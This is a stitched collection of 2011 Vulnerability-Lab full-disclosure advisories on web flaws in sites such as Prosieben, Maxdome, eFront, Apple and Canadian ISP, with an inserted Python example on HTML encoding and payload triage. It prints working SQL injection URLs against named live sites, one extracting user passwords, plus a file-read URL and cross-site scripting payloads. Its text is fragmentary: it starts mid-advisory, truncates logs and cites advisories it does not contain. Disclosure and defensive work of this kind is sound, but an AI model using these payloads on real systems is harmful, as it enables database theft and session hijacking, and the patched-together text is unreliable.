=======================
Remote

Severity:
=========
High

Details:
========
A persistent script code injection vulnerability was detected on the Prosieben community website. Remote attackers
can inject and execute malicious script code on the application side to compromise the community profiles of other
users. Successful exploitation results in session hijacking and profile manipulation via script code injection.

Vulnerable Module(s):
    [+] Profile Content Output - Prosieben Community

Proof of Concept:
=================
The vulnerability can be exploited by a remote attacker with a user account for the community portal.
For demonstration or reproduce ...

<li id="ka_profComment_3464320" class="ka_profComment clearfix" style="height: 0pt;">
  <div class="ka_profileCommentDate">vor 3 Wochen <span class="ka_pipe">|</span>
    <a onclick='var x=.tl(;s_objectID=http://meinecommunity.prosieben.de/service/displayKickPlace.kickAction?u=34728024&as=122896_1;return this.s_oc?this.s_oc(e):true'
       href="/service/displayKickPlace.kickAction?u=34728024&as=122896">Trololol</a>
  </div>
  <div class="ka_profileCommentImg">
    <a onclick='var x=.tl(;s_objectID=http://meinecommunity.prosieben.de/service/displayKickPlace.kickAction?u=34728024&as=122896_2;return this.s_oc?this.s_oc(e):true'
       href="/service/displayKickPlace.kickAction?u=34728024&as=122896">
      <span style="background-image: url(http://media.kickstatic.com/kickapps/images/122896/icons/defaultMember_122896_portrait48X48.jpg);"></span>
    </a>
  </div>
  <div class="ka_profileCommentContent clearfix"><p>[PERSISTENT SCRIPT CODE EXECUTION HERE!]</p></div>
  <div class="ka_profileCommentControls clearfix">
    <span class="ka_flag ka_flag_comment">
      <a class="" onclick='var x=.tl(;s_objectID=http://meinecommunity.prosieben.de/service/displayKickPlace.kickAction?u=34728024&as=122896#_4;return this.s_oc?this.s_oc(e):true'
         href="#">Beitrag melden</a>
    </span>
  </div>
</li>

Risk:
=====
The security risk of the persistent script code injection is estimated as high(-).

Credits:
========
Vulnerability Research Laboratory - Alexander Fuchs (F0x23)
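The Skype, Content Papst, iGuard, WhiteHouse and Prosieben advisories above all come down to one defect: a user-supplied string (a search term, a category title, a profile city, a comment) is written back into HTML without output encoding. The block below is an added example and not code from any of those sites; it renders a stored value the vulnerable way and the encoded way, and runs a coarse triage check over stored records of the kind a responder would use to find payloads already sitting in a database. The template fragments, the field name profile_city and the sample records are assumptions; only the first sample is the advisory's own Skype payload.

```python
import html
import re

# Constructed samples: the first is the reflected payload from the Skype
# advisory, the second mirrors the iframe-in-title injection seen in the
# Content Papst category listing, the third is harmless profile data.
STORED = {
    "skype_poc": '<img src="tester1337.png" onerror="alert(\'CROSS-SITE-SCRIPTING\')" />',
    "category_title": 'hacker23<iframe src="http://vulnerability-lab.com" width="1000" height="800">',
    "profile_city": "Arlington, VA",
}


def render_vulnerable(value: str) -> str:
    """The flawed pattern: the stored value is concatenated into the page both
    as element text and inside a value="" attribute (template is assumed)."""
    return f'<div class="details">{value}</div><input name="profile_city" value="{value}" type="text" />'


def render_safe(value: str) -> str:
    """Encode for each output context: element text needs <, > and & escaped;
    an attribute additionally needs the quote characters escaped."""
    text = html.escape(value, quote=False)
    attr = html.escape(value, quote=True)
    return f'<div class="details">{text}</div><input name="profile_city" value="{attr}" type="text" />'


# Coarse triage pattern for data that is supposed to be plain text: an HTML
# tag opener or a javascript: URL scheme. Deliberately broad; review hits by hand.
_SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z][\w-]*|javascript\s*:", re.IGNORECASE)


def looks_like_markup(value: str) -> bool:
    return _SUSPICIOUS.search(value) is not None


def find_stored_payloads(records: dict) -> list:
    """Keys whose stored value would render as live markup if output raw."""
    return [key for key, value in records.items() if looks_like_markup(value)]


def renders_inert(value: str) -> bool:
    """True when the attribute-encoded form of the value contains no markup."""
    return not looks_like_markup(html.escape(value, quote=True))


if __name__ == "__main__":
    print("stored payloads:", find_stored_payloads(STORED))
    for key, value in STORED.items():
        print(f"\n[{key}] raw:     {render_vulnerable(value)}")
        print(f"[{key}] encoded: {render_safe(value)}  inert={renders_inert(value)}")
```

Two things the example makes visible that the advisories only imply: the encoding has to be chosen per output context (the same value needs quotes escaped inside value="" but not between tags), and encoding at output time leaves the stored payload in place, so the triage scan is still needed to clean up records injected before the fix.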
[Full-disclosure] Opera Browser v11.52 - Stack Buffer Overflow Vulnerability (DoS)
Title:
======
Opera Browser v11.52 - Stack Buffer Overflow Vulnerability

Date:
=====
2011-10-28

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=275
http://packetstormsecurity.org/files/106020/opera1152-overflow.txt

VL-ID:
=====
299

Introduction:
=============
Opera is a web browser and Internet suite developed by Opera Software with over 200 million users worldwide. The
browser handles common Internet-related tasks such as displaying web sites, sending and receiving e-mail messages,
managing contacts, chatting on IRC, downloading files via BitTorrent, and reading web feeds. Opera is offered free of
charge for personal computers and mobile phones. Opera does not come packaged with any desktop operating system.
However, it is the most popular desktop browser in some countries, such as Ukraine. Opera Mini, which is the most
popular mobile web browser as of May 2011, has been chosen as the default integrated web browser in several mobile
handsets by their respective manufacturers. Features include tabbed browsing, page zooming, mouse gestures, and an
integrated download manager. Its security features include built-in phishing and malware protection, SSL/TLS
encryption when browsing HTTPS websites, and the ability to easily delete private data such as HTTP cookies. Opera is
known for originating many features later adopted by other web browsers. Opera runs on a variety of personal computer
operating systems, including Microsoft Windows, Mac OS X, Linux, and FreeBSD. Editions of Opera are available for
devices using the Maemo, BlackBerry, Symbian, Windows Mobile, Android, and iOS operating systems, as well as Java
ME-enabled devices. Approximately 120 million mobile phones have been shipped with Opera. Opera is the only commercial
web browser available for the Nintendo DS and Wii gaming systems. Some television set-top boxes use Opera. Adobe
Systems has licensed Opera technology for use in the Adobe Creative Suite.
(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Opera_%28web_browser%29)

Abstract:
=========
The Vulnerability Laboratory Team discovered a stack buffer overflow vulnerability (denial of service effect) in
Opera's new browser v11.52.

Report-Timeline:
================
2011-10-28: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
A stack buffer overflow vulnerability was detected in the Opera v11.52 web browser. The bug is located in the
browser's handling of a switch between two different escape sequences. The vulnerability results in a remote denial of
service (application crash). Overwrite of EIP & co. is not possible!

Vulnerable Module(s):
    [+] Escape sequence switch

--- Debug Logs ---
Executable search path is:
ModLoad: 0124 01329000 C:\Program Files (x86)\Opera\opera.exe
ModLoad: 7743 775b C:\Windows\SysWOW64\ntdll.dll
ModLoad: 76a3 76b4 C:\Windows\syswow64\kernel32.dll
ModLoad: 765b 765f6000 C:\Windows\syswow64\KERNELBASE.dll
ModLoad: 74db 74eb C:\Windows\syswow64\USER32.dll
ModLoad: 7555 755e C:\Windows\syswow64\GDI32.dll
...
...
...
...
ModLoad: 7504 75075000 C:\Windows\syswow64\WS2_32.dll
ModLoad: 74da 74da6000 C:\Windows\syswow64\NSI.dll
ModLoad: 7513 751ab000 C:\Windows\syswow64\COMDLG32.dll
ModLoad: 7660 7662d000 C:\Windows\system32\Wintrust.dll
ModLoad: 767d 768ed000 C:\Windows\syswow64\CRYPT32.dll
ModLoad: 7740 7740c000 C:\Windows\syswow64\MSASN1.dll
ModLoad: 7495 74963000 C:\Windows\system32\dwmapi.dll
ModLoad: 744f 744fb000 C:\Windows\system32\profapi.dll
ModLoad: 6fac 6fac9000 C:\Windows\system32\LINKINFO.dll
ModLoad: 716e 716e5000 C:\Windows\system32\Msimg32.dll
ModLoad: 7453 7456c000 C:\Windows\system32\mswsock.dll
ModLoad: 7452 74525000 C:\Windows\System32\wshtcpip.dll
ModLoad: 73a9 73aa C:\Windows\system32\NLAapi.dll
ModLoad: 73a8 73a9 C:\Windows\system32\napinsp.dll
ModLoad: 73a5 73a62000 C:\Windows\system32\pnrpnsp.dll
ModLoad: 73a0 73a44000 C:\Windows\system32\DNSAPI.dll
ModLoad: 739f 739f8000 C:\Windows\System32\winrnr.dll
ModLoad: 6fbf 6fbf6000 C:\Windows\System32\wship6.dll
...
...
...
...
ModLoad: 6f28 6f2ae000 C:\Windows\system32\mlang.dll
ModLoad: 7350 73508000 C:\Windows\system32\Secur32.dll
ModLoad: 6f1a 6f1a8000 C:\Windows\system32\credssp.dll
ModLoad: 6eaf 6eb2a000 C:\Windows\SysWOW64\schannel.dll
ModLoad: 6fba 6fbec000 C:\Windows\system32\apphelp.dll
ModLoad: 6fa4 6fab C:\Windows\system32\ntshrui.dll
ModLoad: 7401 74029000 C:\Windows\system32\srvcli.dll
ModLoad: 71b2
[Full-disclosure] eFront Enterprise v3.6.10 - Multiple Remote Vulnerabilities
Title: eFront Enterprise v3.6.10 - Multiple Remote Vulnerabilities
Date: 2011-10-27
References: http://www.vulnerability-lab.com/get_content.php?id=298
VL-ID: 298

Introduction:
Tailored with larger organizations in mind, eFront Enterprise offers solutions for the management of companies' most valued asset - the people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Enterprise platform offers the means of aligning learning programs with business goals to cultivate employee skills and knowledge associated with business performance. eFront Enterprise builds on top of eFront Educational.
(Copy of the Vendor Homepage: http://efrontlearning.net/product/efront-enterprise.html)

Abstract:
An anonymous researcher of the Vulnerability Laboratory Team discovered multiple remote vulnerabilities on the eFront Enterprise CMS v3.6.10.

Report-Timeline:
2011-10-20: Vendor Notification
2011-10-21: Vendor Response/Feedback
2011-10-26: Vendor Fix/Patch
2011-10-27: Public or Non-Public Disclosure

Status: Published
Exploitation-Technique: Remote
Severity: Critical

Details:
1.1
An anonymous researcher of the Vulnerability Laboratory Team discovered multiple SQL injection vulnerabilities on the eFront Enterprise CMS v3.6.10. The vulnerability allows a remote attacker or a local privileged user account (low: trainee) to inject own SQL commands/statements over a vulnerable parameter. Successful exploitation of the SQL injection vulnerability can result in DBMS & CMS compromise.

Vulnerable Module(s):
[+] survey
Vulnerable File(s):
[+] professor.php
Vulnerable Param(s):
[+] ?ctg=survey&surveys_ID=
[+] ?ctg=survey&screen_survey=

1.2
An anonymous researcher of the Vulnerability Lab Team discovered a database disclosure vulnerability on the eFront Enterprise CMS v3.6.10. Successful exploitation can result in a database steal after upgrade or installation of the CMS.

Vulnerable Module(s):
[+] Install
Vulnerable File(s):
[+] install.php
Vulnerable Param(s):
[+] ?step=2&upgrade=1

Proof of Concept:
The vulnerabilities can be exploited by remote attackers & local low privileged user accounts. For demonstration or reproduce ...

1.1 - SQL Injection Vulnerabilities
PoC:
http://xxx.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=0--
http://xxx.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=1--

1.2 - Database Disclosure Vulnerability
PoC:
http://www.xxx.com/e-learning/www/install2/install.php?step=2&upgrade=1
View Source

Solution:
2011-10-26: Vendor Fix/Patch - http://forum.efrontlearning.net/viewtopic.php?f=15&t=3501

Risk:
The security risk of the vulnerabilities is estimated as high(+).

Credits:
Vulnerability Research Laboratory - Mohammed Abdelkader A.

Disclaimer:
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2011 | Vulnerability-Lab
--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Maxdome Website - SQL Injection Vulnerability
Title: Maxdome Website - SQL Injection Vulnerability
Date: 2011-10-26
References: http://www.vulnerability-lab.com/get_content.php?id=300
VL-ID: 300

Introduction:
maxdome is the video-on-demand offering of ProSiebenSat.1 Media. The pay-per-view offering is the largest and most used one in Europe. Available are current films and series, often even before the actual TV broadcast on free or pay TV, as well as a large number of comedy contents, documentaries, sports and music videos.
(Copy of the Vendor Homepage: http://www.maxdome.com)

Abstract:
A Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on the famous Maxdome Portal (videothek) website.

Report-Timeline:
2010-12-14: Vendor Notification
2011-05-07: Vendor Response/Feedback
2011-09-03: Vendor Fix/Patch - CHECK BY US!
2011-10-26: Public or Non-Public Disclosure

Status: Published
Exploitation-Technique: Remote
Severity: Critical

Details:
A remote SQL Injection vulnerability is detected on MaxDome's Videothek Portal website. The vulnerability allows a remote attacker to inject own SQL commands over the weak id parameter request.

Vulnerable Module(s):
[+] Home Flash Video Component

Picture(s):
../sql1.png

Proof of Concept:
The SQL injection vulnerability can be exploited by remote attackers. For demonstration or reproduce ...

Path: /php-bin/functions/home_flash/
File: homeflash.swf
Para: ?id=

<html>
<head>
<body>
<title>MaxDome - Remote SQL Injection PoC</title>
<br><br>
<b>Version</b>
<iframe src=http://www.maxdome.de/php-bin/functions/home_flash/homeflash.swf?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,@@version,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+ width=800 height=800>
<br><br>
</body>
</head>
</html>

Reference(s):
http://www.maxdome.de/php-bin/functions/home_flash/homeflash.swf?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,@@version,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+

Risk:
The security risk of the SQL injection vulnerability is estimated as critical.

Credits:
Vulnerability Research Laboratory - N/A Anonymous
[Full-disclosure] HackInTheBox Quartal Magazine - eZine Issue #007
;)

Title: HITB Quartal Magazine - eZine Issue 007
Date: 2011-10-18
References:
Original: http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-007.pdf
Article: http://magazine.hitb.org/
Mirror: http://www.vulnerability-lab.com/resources/documents/297.pdf
Article: http://www.vulnerability-lab.com/get_content.php?id=297
VL-ID: 297

Status: Published
Exploitation-Technique: Magazine
Severity: Critical

Details:
Hello readers and welcome to issue #7. It has been a long journey since the first release of the magazine and we have seen a lot of changes and improvements over time and are still trying our best to do more. But as we grow, the amount of work and the time we need to spend working on the magazine have also increased, thus requiring us to recruit more people to join our small editorial team. So, if you think you would like to do something for the community and believe that we can have a great use of your talent - feel free to drop us an email!

As for issue #7, Jonathan Kent wrote a great article about the current global crisis in cyberspace, while Aditya K. Sood and his team on the other hand wrote about extending SQL injection attacks through buffer overflow exploitation. We are also very happy to have Jonathan Brossard contributing an article introducing the readers to his newly released exploitation framework. We will leave you to explore the rest of the articles and we hope you enjoy them.

Have fun reading this issue and more to come in issue #8!!

Zarul Shahrin Suhaimi
Editor-in-Chief, Hack in The Box Magazine

Credits:
HackintheBox Team (HITB) - magazine.hitb.org
[Full-disclosure] Skype Software Vulnerabilities - 0 Day Exploitation 2011
Title: Skype Software Vulnerabilities - 0 Day Exploitation 2011 [HACK IN THE BOX MALAYSIA #2011 KUL CONFERENCE] (13th)
Date: 2011-10-16
References:
Article: http://www.vulnerability-lab.com/get_content.php?id=293
Document: http://www.vulnerability-lab.com/resources/documents/293.pdf
Speaker: http://conference.hitb.org/hitbsecconf2011kul/?page_id=1757
Conference Mirror: http://conference.hitb.org/hitbsecconf2011kul/materials/D2T1 - SKYPE SOFTWARE VULNERABILITIES - ZERO DAY EXPLOITATION 2011.zip
VL-ID: 293

Status: Published
Exploitation-Technique: Report
Severity: Critical

Details:
SKYPE VOICE OVER IP - SOFTWARE VULNERABILITIES TECHNIQUES METHODS – ZERO DAY EXPLOITATION 2011

1. (Overview) Authors of the Skype Exploitation White-Paper
 - 1.1 Pim J.F. Campers
 - 1.2 Benjamin Kunz Mejri
2. (Preface) Information around the White-Paper Skype
 - 2.1 Infomercial
3. (Overview) Published Skype Vulnerabilities 2004-2010
 - 3.1 URI Handler Skype Vulnerabilities
 - 3.2 Denial of Service Skype Vulnerabilities
 - 3.3 Creation & Deletion Skype Vulnerabilities
 - 3.4 Buffer Overflow Skype Vulnerabilities
4. (How 2 Exploit & Detect?)
 - 4.1 How to detect own Skype 0-day vulnerabilities?
 - 4.2 How to exploit Skype 0-day vulnerabilities out of the box?
 - 4.2.1 Client Side Exploitation Map (Remote)
 - 4.2.2 Server-Side 1 Exploitation Map (Remote & Local)
 - 4.2.3 Server-Side 2 Exploitation Map (Remote & Local)
 - 4.2.4 Pointer Exploitation Map (Local)
 - 4.2.5 Exchange Buffer Overflow Map (Remote & Local)
 - 4.2.7 Denial of Service Map (Local to Remote)
5. (Main Presentation) Presentation of own 0 day Skype Vulnerabilities
 - 5.6 Skype v5.3.x v2.2.x v5.2.x – Denial of Service Vulnerability
 - 5.2 Skype 5.3.x 2.2.x 5.2.x - Persistent Software Vulnerability
 - 5.1 Skype 5.3.x 2.2.x 5.2.x - Persistent Profile XSS Vulnerability
 - 5.5 Skype v5.2.x and v5.3.x – Memory Corruption Vulnerability
 - 5.3 Skype v5.3.x - Transfer Standby Buffer Overflow Vulnerability
6. Skype Security Time-Lines
 - 6.1 Response, Fix/Patch Time-Line
7. (Review) Security Session Videos
 - 6.1 Skype (VoIP) - Denial of Service Vulnerability.wmv [HD]
 - 6.2 Skype (VoIP) - Persistent Profile XSS Vulnerability [HD]
 - 6.3 Skype (VoIP) - [Pointer Bug] Memory Corruption [HD]
8. Credits & Infomercial
 - 8.1 Vulnerability Laboratory

Credits:
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) & Pim J.F. Campers (X4lt)
[Full-disclosure] Sparkasse Bank – Tricky Card Bug on ATM [ATM Adventure]
Title: Sparkasse Bank – Tricky Card Bug on ATM [ATM Adventure]
Date: 2011-10-17
References:
Document: http://www.vulnerability-lab.com/resources/documents/295.pdf
Article: http://www.vulnerability-lab.com/dev/?p=247
VL-ID: 295

Status: Published
Exploitation-Technique: Report
Severity: High

Details:
In this paper a researcher called rem0ve explains a tricky bug in the card reader sensor of the Sparkassen ATM in Europe. The video presentation was given at Hack in the Box Malaysia (hack a week/day room) on 2011-10-13.

Credits:
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
[Full-disclosure] eFront Enterprise Edition v3.6.9 - SQL Injection Vulnerability
Title: eFront Enterprise Edition v3.6.9 - SQL Injection Vulnerability
Date: 2011-10-07
References: http://www.vulnerability-lab.com/get_content.php?id=230
VL-ID: 230

Introduction:
Tailored with larger organizations in mind, eFront Enterprise offers solutions for the management of companies' most valued asset - the people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Enterprise platform offers the means of aligning learning programs with business goals to cultivate employee skills and knowledge associated with business performance. eFront Enterprise builds on top of eFront Educational.
(Copy of the Vendor Homepage: http://efrontlearning.net/product/efront-enterprise.html)

Abstract:
An anonymous researcher of the Vulnerability Lab Team discovered a critical SQL Injection vulnerability on eFront CMS v3.6.9.

Report-Timeline:
2011-09-18: Vendor Notification
2011-09-21: Vendor Response/Feedback
2011-10-06: Vendor Fix/Patch
2011-10-07: Public or Non-Public Disclosure

Status: Published
Affected Products: eFront
Product: eLearning Enterprise Edition v3.6.9
Exploitation-Technique: Remote
Severity: Critical

Details:
A SQL Injection vulnerability is detected on eFront's CMS v.3.6.9! The bug allows a remote attacker to inject/execute own SQL statements over the vulnerable parameter request. Successful exploitation of the bug can lead to DBMS & CMS compromise.

Vulnerable Module(s):
[+] student section
Vulnerable File(s):
[+] student.php
Vulnerable Param(s):
[+] ?ctg=messages&folder=
Pictures:
../1.png

Proof of Concept:
The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...

PoC:
http://xxx.net/enterprise/www/student.php?ctg=messages&folder=7+/*!Union*/Select+1,2,3,4,5,6,version%28%29,8,9,10,11,12--

Full: (reproduce)
http://demo.efrontlearning.net/enterprise/www/student.php?ctg=messages&folder=64+/*!Union*/Select+1,2,3,4,5,6,password,8,9,10,11,12+from+users--

Solution:
2011/10/10 v3.6.10 build 11944 - http://www.efrontlearning.net/download

Risk:
The security risk of the remote SQL injection vulnerability is estimated as critical.

Credits:
Vulnerability Research Laboratory - Mohammed Abdelkader A.
[Full-disclosure] Apple Website - Non Persistent Cross Site Scripting Vulnerability
Title: Apple Website - Non Persistent Cross Site Vulnerability
Date: 2011-10-07
References: http://www.vulnerability-lab.com/get_content.php?id=289
VL-ID: 289

Introduction:
Our communities are filled with thousands of Mac, iPod, iPhone and iPad users from around the world. Begin by finding the community focused on your product or topic. Browse the threads for answers, ask a question or help out by answering questions. Get an answer quickly. Like or reply to any post. You'll be notified by email if anyone replies to your posts. Ask the community and easily track responses. Help community members get the most out of their products. Get only the content you want in one place.
(Copy of the Vendor Homepage: https://discussions.apple.com/static/apple/tutorial/welcome.html)

Abstract:
Vulnerability-Lab Team (Alexander F.) discovered a non-persistent input validation vulnerability on the famous Apple vendor website.

Report-Timeline:
2011-10-05: Vendor Notification
2011-10-06: Vendor Response/Feedback
2011-10-07: Vendor Fix/Patch
2011-10-07: Public or Non-Public Disclosure

Status: Published
Affected Products: Apple Website - 2011/Q3
Exploitation-Technique: Remote
Severity: Medium

Details:
A non-persistent cross site scripting vulnerability is detected on the famous Apple vendor website portal. Successful exploitation of the vulnerability allows an attacker to hijack user/mod/admin sessions of the portal.

Vulnerable Module(s):
[+] Exception-Handling - We are Sorry

Picture(s):
../1.png
../2.png

Proof of Concept:
The vulnerabilities can be exploited by remote attackers with required user interaction. For demonstration or reproduce ...

PoC:
<!-- BEGIN main body -->
<div id="jive-body-main">
<!-- BEGIN main body column -->
<div id="jive-body-maincol-container">
<div id="jive-body-maincol">
<h1 class="apple-account-issue-reported">We're sorry.</h1>
<div id="apple-sso-error">
<iframe src="http://www.vulnerability-lab.com" onload=alert("vulnerabilitylab") height=800px width=900px>=[x]
</div><div id="apple-sso-home">
Return to <a href="https://discussions.apple.com">Apple Support Communities</a>.
</div>
</div>
</div>
<!-- END main body column -->
</div>
<!-- END main body -->
</div>
<div class="clear"></div>
<div class="boot"></div>
</div><!--/content-->
</div><!--/#main-->

Reference(s):
../apple-sso-error.txt
../sso-error!home.jspa

Risk:
The security risk of the reflective XSS vulnerabilities is estimated as medium(-).

Credits:
Vulnerability Research Laboratory - Alexander Fuchs (f0X23)
[Full-disclosure] eFront Enterprise v3.6.9 - Arbitrary Download Vulnerability
Title: eFront Enterprise v3.6.9 - Arbitrary Download Vulnerability
Date: 2011-10-08
References:
http://www.vulnerability-lab.com/get_content.php?id=290
http://www.vulnerability-lab.com/get_content.php?id=230
VL-ID: 290

Introduction:
Tailored with larger organizations in mind, eFront Enterprise offers solutions for the management of companies' most valued asset - the people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Enterprise platform offers the means of aligning learning programs with business goals to cultivate employee skills and knowledge associated with business performance. eFront Enterprise builds on top of eFront Educational.
(Copy of the Vendor Homepage: http://efrontlearning.net/product/efront-enterprise.html)

Abstract:
A researcher of the Vulnerability Laboratory Team discovered a remote arbitrary download vulnerability on the eFront Enterprise CMS v3.6.9.

Report-Timeline:
2011-09-28: Vendor Notification
2011-09-29: Vendor Response/Feedback
2011-10-06: Vendor Fix/Patch
2011-10-08: Public or Non-Public Disclosure

Status: Published
Affected Products: eFront
Product: eLearning Enterprise Edition v3.6.9
Exploitation-Technique: Remote
Severity: High

Details:
A remote arbitrary download vulnerability is detected on eFront's CMS v.3.6.9! The bug allows a remote attacker to read and even download files over the vulnerable parameter request. Successful exploitation of the bug can lead to reading and downloading of important configuration files by trainers & trainees.

Vulnerable Module(s):
[+] Administration, Trainee & Trainer Section
Vulnerable File(s):
[+] view_file.php
Vulnerable Param(s):
[+] ?file=

Picture(s):
../1.png
../2.png

Proof of Concept:
The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...

PoC:
http://demo.xxx.com/enterprise/www/view_file.php?file=/var/www/vhosts/demo/enterprise/www/administrator.php
http://demo.xxx.com/enterprise/www/view_file.php?file=/var/www/vhosts/demo/enterprise/www/view_file.php

Solution:
2011-10-08 v3.6.10 build 11944 - http://www.efrontlearning.net/download

Risk:
The security risk of the remote arbitrary download vulnerability is estimated as high.

Credits:
Vulnerability Research Laboratory - Chokri B.A (Meister) [http://www.vulnerability-lab.com/show.php?user=Chokri%20B.A.]
Re: [Full-disclosure] 0day Full disclosure: American Express
Hey Andreas, read the following article, it's fresh and new ...
http://www.vulnerability-lab.com/dev/

This is 4 real ^^

On 06.10.2011 12:18, Andreas wrote:
Quoting Carlos Alberto Lopez Perez clo...@igalia.com:
American Express admins look really worried by security. At least they thought about the remote possibility of google indexing the admin panel, so they disabled it at https://www.americanexpress.com/robots.txt
smart move :-)
because RewriteCond is hardcore stuff _
ups, it's an ibm httpd server.
Re: [Full-disclosure] 0day Full disclosure: American Express
ack

On 06.10.2011 14:38, resea...@vulnerability-lab.com wrote:
Hey Andreas, read the following article, it's fresh and new ...
http://www.vulnerability-lab.com/dev/
This is 4 real ^^

On 06.10.2011 12:18, Andreas wrote:
Quoting Carlos Alberto Lopez Perez clo...@igalia.com:
American Express admins look really worried by security. At least they thought about the remote possibility of google indexing the admin panel, so they disabled it at https://www.americanexpress.com/robots.txt
smart move :-)
because RewriteCond is hardcore stuff _
ups, it's an ibm httpd server.
[Full-disclosure] Canadian ISP Website - SQL Injection Vulnerability
Title: Canadian ISP Website - SQL Injection Vulnerability
Date: 2011-09-23
VL-ID: 282
Reference: http://www.vulnerability-lab.com/get_content.php?id=282

Introduction:
Canadianisp.ca is a wholly owned project of Marc Bissonnette / InternAlysis. It was originally created as a joint venture with Bob Carrick of Carrick Solutions, with sole ownership transferring to Marc Bissonnette on February 16th, 2004. Canadianisp.ca is the only website that allows you to search for an Internet service provider (Dial-up, ISDN, DSL, Cable, Satellite, Point to Point, Wireless and Voice Over IP (VoIP)) anywhere in Canada. Customers can post reviews, and ISPs submit their own services. All for free. CanadianISP is also one of the most accurate and most up-to-date ISP lists on the net. There are many ISP lists out there, but the vast majority of them (as far as we have seen, and we last searched and looked in April of 2011) are out of date, listing companies no longer in business, no longer providing connectivity or simply pages of ads with no relevance to the user's search parameters. ISPs can submit and edit / update their own services at all times, free of charge.
(Copy of the Vendor Homepage: www.canadianisp.ca/about.htm)

Abstract:
Vulnerability-Lab Team discovered a critical remote SQL Injection vulnerability on the Canadian ISP main vendor website.

Report-Timeline:
2011-09-24: Vendor Notification
2011-10-03: Vendor Response/Feedback
2011-10-04: Vendor Fix/Patch
2011-10-04: Public or Non-Public Disclosure

Status: Published
Affected Products: Canadian ISP Website - 2011/Q2-3
Exploitation-Technique: Remote
Severity: Critical

Details:
A SQL Injection vulnerability is detected on the Canadian ISP website. The bug allows remote attackers to inject/execute own SQL statements/commands over a vulnerable application parameter on the main web service. Successful exploitation of the remote SQL injection vulnerability can result in database management system compromise & website manipulations.

Vulnerable Module(s):
[+] ispsearch.cgi
Vulnerable Param(s):
[+] ispid
Pictures:
../1.png

Proof of Concept:
The vulnerability can be exploited by remote attackers without user interaction. For demonstration or reproduce ...

<html>
<head><body>
<title>Remote SQL Injection PoC - CANADIAN ISP</title>
<iframe src=http://www.canadianisp.ca/cgi-bin/ispsearch.cgi?f=ShowDetail&ispid=19+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,concat_ws%280x3a3a,user%28%29,database%28%29,version%28%29%29,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447-->
<br><br>
</body></head>
</html>

Risk:
The security risk of the remote SQL injection vulnerability is estimated as critical.

Credits:
Vulnerability Research Laboratory - Chokri B.A. (Me!ster) [TN]
[Full-disclosure] Prosieben Website - Multiple SQL Injection Vulnerabilities
Title:
======
Prosieben Web Services - Multiple SQL Injection Vulnerabilities

Date:
=====
2011-09-26

VL-ID:
======
284

Abstract:
=========
The Vulnerability Lab Research Team discovered multiple remote SQL Injection vulnerabilities on prosiebens - tvtotal vendor website.

Report-Timeline:
================
2011-09-01: Vendor Fix/Patch
